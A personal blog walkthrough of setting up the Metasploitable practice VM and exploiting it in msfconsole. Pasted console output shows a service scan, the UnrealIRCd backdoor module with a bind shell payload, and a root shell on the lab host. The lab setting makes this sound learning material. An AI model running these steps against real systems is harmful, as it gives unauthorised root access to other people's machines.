Greetings People - In my first post, I felt like I owed a few details. This time I'll get a little more detailed. Why write about Metasploitable? Because it's an easy and fun way to learn how to manage the msfconsole. Let's begin... Set parameters and give the name VM :

Followed by:

We got a:

You must enable in system/processor/enable PAE..NX:

Put VM in Bridge adapter mode and it will give you the IP in Advanced settings - "Allow All":

And, finally, we got a our VM:

Log in and type:ifconfig ,.default. The username and password are msfadmin:

Fire up msfconsole :

If you remember in my first post, I was not able to open a session because I didn't want to erase the old hosts. Let s do that now :msf > hosts -dHosts=====address mac name os_name os_flavor os_sp purpose info comments------- --- ---- ------- --------- ----- ------- ---- --------*] Deleted 1 hostsok now let s hack that machine..msf > servicesServices========host port proto name state info---- ---- ----- ---- ----- ----192.168.1.3 21 tcp ftp open vsftpd 2.3.4192.168.1.3 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0192.168.1.3 23 tcp telnet open Linux telnetd192.168.1.3 25 tcp smtp open Postfix smtpd192.168.1.3 53 tcp domain open ISC BIND 9.4.2192.168.1.3 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2192.168.1.3 111 tcp rpcbind open 2 RPC#100000192.168.1.3 139 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP192.168.1.3 445 tcp netbios-ssn open Samba smbd 3.X workgroup: WORKGROUP192.168.1.3 512 tcp exec open netkit-rsh rexecd192.168.1.3 513 tcp login open192.168.1.3 514 tcp tcpwrapped open192.168.1.3 1099 tcp rmiregistry open GNU Classpath grmiregistry192.168.1.3 1524 tcp shell open Metasploitable root shell192.168.1.3 2049 tcp nfs open 2-4 RPC#100003192.168.1.3 2121 tcp ccproxy-ftp open192.168.1.3 3306 tcp mysql open MySQL 5.0.51a-3ubuntu5192.168.1.3 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7192.168.1.3 5900 tcp vnc open VNC protocol 3.3192.168.1.3 6000 tcp x11 open access denied192.168.1.3 6667 tcp irc open Unreal ircd192.168.1.3 8009 tcp ajp13 open Apache Jserv Protocol v1.3192.168.1.3 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1msf exploit(unreal_ircd_3281_backdoor) > show payloadsCompatible Payloads===================Name Disclosure Date Rank Description---- --------------- ---- -----------cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl)cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6cmd/unix/generic normal Unix Command, Generic Command Executioncmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet)cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl)cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl)cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby)cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet)msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.3RHOST => 192.168.1.3msf exploit(unreal_ircd_3281_backdoor) > set PAYLOAD cmd/unix/bind_perlPAYLOAD => cmd/unix/bind_perlmsf exploit(unreal_ircd_3281_backdoor) > show optionsModule options (exploit/unix/irc/unreal_ircd_3281_backdoor):Name Current Setting Required Description---- --------------- -------- -----------RHOST 192.168.1.3 yes The target addressRPORT 6667 yes The target portPayload options (cmd/unix/bind_perl):Name Current Setting Required Description---- --------------- -------- -----------LPORT 4444 yes The listen portRHOST 192.168.1.3 no The target addressExploit target:Id Name-- ----0 Automatic Targetmsf exploit(unreal_ircd_3281_backdoor) > exploit[*] Started bind handler[*] 192.168.1.3:6667 - Connected to 192.168.1.3:6667...:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead[*] 192.168.1.3:6667 - Sending backdoor command...[*] Command shell session 1 opened (192.168.1.2:55724 -> 192.168.1.3:4444) at 2016-03-20 20:48:08 +0100whoamirootdateSun Mar 20 15:47:23 EDT 2016echo HI CYBRARYHI CYBRARY^CAbort session 1? [y/N] y[*] 192.168.1.3 - Command shell session 1 closed. Reason: User exit That's what I wanted to see last time..it looks like Metasploit has some new banners. I'll let you find out on your own.That's it. I hope you liked it. In the end type IP of VM in a browser - in my case 192.168.1.3and have some more fun:

Till next time...bye from @Dabxxl